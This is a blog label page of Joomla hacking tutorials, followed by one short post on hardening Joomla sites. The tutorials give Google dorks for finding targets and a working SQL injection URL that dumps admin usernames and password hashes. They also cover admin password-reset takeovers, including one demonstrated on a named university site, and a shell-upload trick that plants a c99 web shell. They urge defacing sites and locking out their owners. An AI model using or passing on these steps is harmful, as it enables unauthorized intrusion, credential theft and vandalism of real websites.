Search This Blog

Showing posts with label Joomla Hacking. Show all posts
Showing posts with label Joomla Hacking. Show all posts

Saturday, July 7, 2012

Hacking Joomla Blog with Backtrack 5


Here i am with a new working hack to scan and exploit a Joomla blog. Things you needed are following :
1.Backtrack 5
2.Internet connection

Here are following steps, please follow all the steps according to this post:

 1. Click on Applications/Backtrack/Vulnerability assesment/Web Vulnerability assessment/CMS Vulnerability Identification/joomscan.

2.Now Joomla scanner console will open like in image.


3.Now console will open now type chmod 0777 joomscan.pl and hit enter.

4.Now type  ./joomscan.pl -u www.YourJoomlasite.com in this in place of YourJoomalasite.com type your desired joomala site and hit enter it will start scanning it .

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Saturday, June 2, 2012

How to hack joomla : Tutorial

1-  Finding Exploit And Target

Google dork: inurl:"option=com_mytube"

Type that Dork in Google.



2- Inject Target


Find a url like this:

http://site.com/index.php?option=com_mytube&Itemid=88..
Now replace the url like this:

Click here to view: http://pastebin.com/ZxxU8Nsr

If the site is vulnerable, you can see something like this:



We can see username, email and activation code. (username:email:activation code)

Now, let this page open and open a new page.

3- Admin password reset


Go to:

http://www.site.com/index.php?option=com_user&view=reset
This is standard Joomla! query for password reset request



Type the email adress found in step 2 and press Submit.

The activation code should be resetted.

Return to the first page, refresh the page and take the new activation code.

Paste him in the token and press Submit.

problem with token.. :((

UPDATE: Joomla! 1.5.16 now hashes the reset token

if you see a thing like :$1$14411: after the activation code, it will not work



4- Admin Login

If you done everything ok, your Password page will load. Enter your new password...



After that go to:

http://www.site.com/administrator/


Standard Joomla portal content management system

Enter the username (found in step 2) and your new password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

JomSocial ~ Joomla Shell Upload Vulnerability



image_2303377.original.jpg (600×350)

Stuff you need:
Firefox
Shell
Tamper Data
Vulnerable Site

& a Brain :)

Preparation:
1. Get a shell here. (recommend: c99.php)
2. Download Tamper Data
3. Find a vuln site. *refer to Dorking*

Dorks:
inurl:/com_community/
inurl:/images/originalvideos/
inurl:/index.php?option=com_community&view=videos

Preparing your Shell:
1. Download a shell.
2. Put it in a folder (ex. "myshell")
3. Copy the shell to the same folder and rename it to "yourshell.php.flv"
4. Now in your folder you have 2 files, "myshell.php" & "myshell.php.flv".

Getting Access to site:
1. Register a fake account.
2. Active your fake account.
3. Go to your profile page.
4. Click on Add Video.
5. Choose upload video from computer.

Uploading your Shell:
Upload a video from your computer, please note that if you only see Add video from URL that means the site is not vuln.
The reason for having created a file called "myshell.php.flv", is to trick the uploader into thinking that you are uploading a FLV file.

Uploading shell:

1. Go to upload page, click on add video.
2. Select Add video.
3. Select Upload from Computer.
4. Browse to your "myshell.php.flv".
5. Input Title.
**before you click on upload**
6. Firefox -> Tools -> Tamper Data, click on Start Tamper Data.
7. Now click UPLOAD.
8. Tamper data will then show you if you want to tamper, uncheck continue to tamper then click on tamper.
9. Look for "myshell.php.flv" then delete the .flv part meaning you will have "myshell.php" left.
10. SUBMIT.
11. Wait for it, and you will see the successful upload page.
12. Congrats you have uploaded a shell.

Shell location:
1. Go to http://[slave]/images/originalvideos/
2. There you will find folders named in numbers. (yours is most likely the last/bottom folder)
3. Most of the folders will contain .flv, .avi && etc etc.
4. Your folder will contain a random generated name with a PHP file extension.
5. Open your "random.php"
6. And your IN!

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Joomla Hacking Tutorial

Introduction : Joomla! as Stable-Full Package is probably unhackable and 
If someone tells that HACKED Joomla, talking rubbish!!!
But people still hacked sites that use Joomla as Content Management System?!? 
Joomla is made of components and modules and there are some developers apart from 
official team that offer their solutions to improve Joomla. 
That components and modules mede by that other developers are weak spots!


I hacked site that use Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can't tell that I hacked Joomla!


Finding Exploit And Target : Those two steps could go in different order, depend what you find first target or exploit...


Google dork: inurl:"option=com_idoblog"
Comes up with results for about 140,000 pages

joomla hacking


Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vulnrablity

index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,​11,12,13,14,15,16+from+jos_users--


Exploit can be separated in two parts:


Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opening blog Admin page and if Admin page don't exist, exploit won't worked (not completely confirmed)


Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,1​5,16+from+jos_users--
This part looking for username and password from jos_users table


Testing Vulnerability

Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and unclick 'Load images automatically'


Go to:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
Site load normally...


Go to:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
Site content blog Profile Admin


Go to:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--
Site is vulnerable


Inject Target


Open reiluke SQLiHelper 2.7
In Target copy


http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
and click on Inject
Follow standard steps until you find Column Name, as a result we have 

joomla hacking


Notice that exploit from inj3ct0r wouldn't work here because it looking for jos_users table and as you can see
our target use jos153_users table for storing data


Let Dump username, email, password from Column Name jos153_users. Click on Dump Now

joomla hacking


username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI

Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
32 character salt that is appended to the end of the password string. The password is stored as 
{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time...


The easiest way to hack is to reset Admin password!


Admin Password Reset


Go to:
http://www.site.com/index.php?option=com_user&view=reset
This is standard Joomla! query for password reset request



joomla hacking
Forgot your Password? page will load.
In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.
If you find right admin email, Confirm your account. page will load, asking for Token:

Finding Token

To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users

username: admin
activation: 5482dd177624761a290224270fa55f1d

5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit.

joomla hacking
If you done everything ok, Rest your Password page will load. Enter your new password...

After that go to:
http://www.site.com/administrator/
Standard Joomla portal content management system

Enter username admin and your password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!

joomla hacking
To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail

joomla hacking

Share Links and Make this tutorial alive!!!
Cheers! 

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Joomla Password Reset vulnerability



86d1be909ee2523009c60b5e699006d7d6d4f8bf_large.jpg (600×600)
Joomla Password Reset vulnerability : Explain with Live demo : 

website  : http://miit.unikl.edu.my/ 


The tricks is like this:

1. Go to http://miit.unikl.edu.my/index.php?option=com_user&view=reset&layout=confirm
then you will be prompt for a token in which the token is suppose already sent to your email,

2. Now, put a single quote ' into field text box "token" and Click OK.
The sql query then will be looks like this : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "
3. Write new password for admin 4. Go to url : http://miit.unikl.edu.my/administrator/ 5. Login admin with your new password ** update: miit joomla was patched.. Try any site else

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Friday, June 1, 2012

HOW TO SECURE YOUR JOOMLA SITES BEFORE THEY ARE HACKED!


Ihave written a post earlier about why you should keep your Joomla sites updated for safety reasons. Phil Taylor published this Tweet today: A lot of people getting old versions of #joomla 1.5 hacked today - been fixing sites all day for customers...UPGRADE NOW to #Joomla (latest version) I couldn't say it better myself. It's crucial that you upgrade to the latest version of Joomla.
When you've done that, there are several other actions you can and should take to avoid being hacked:

  • Follow the Joomla Administrator's Security Checklist
    The guys at joomla.org have put together a Joomla Administrator's Security Checklist - use it and secure yourJoomla site as much as possible using the guidelines.
  • Install the jSecure Authentication pluginEvery Joomla back-end has the same URL. If you install a security plugin, you can add a suffix to your back-end URL to make it look like this: http://www.yoursite.com/administrator?helloworld
    If the URL is not entered with a correct suffix, the site will redirect to a 404 (not found) page. Change the suffix regularly. The plug-in is $4.99 and it's worth it!
    Buy and download the jSecure Authentication plugin here
  • Don't use the jos_ prefixThe standard prefix for Joomla tables are jos_. However, many security exploits rely onyour database tables being called jos_XXXXXX.
    By simply using your own prefix you would have been protected from these exploits.
    It should also be unique for every site.
    Read more about this over at the blog of Brian Teeman.
  • Change your admin userThe default ID for the admin user in Joomla is always 62, and this may be used by a hacker. To avoid this, do the following:
    • Create a new super-administrator with another user name and a strong password
    • Log out and in again as this new user
    • Change the original admin user to a manager and save (you are not allowed to delete a super-administrator).
    • Now, delete the original admin user (user ID 62).
      Thanks to Brian Teeman for this tip!
  • Use a unique and strong password
    Create a unique passwords from a combination of upper- and lowercase letters, numbers and symbols. For instance WsHc3_#7
    Use an Online Password Generator to make the process easier.
  • Change your username and password often
    At least every 3 months.
  • Don't use the root user in mySQL as the user of your databaseYou should always create a new database user when installing a new site, and give rights to the new database only. This way, the user will only have access to the specific site. If not, you can have one site hacked and the rest are wide open as well...
  • Always update to the latest Joomla versionCan not be said too often ;)
Have any other tips? Let me hear them in the comments field!


Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo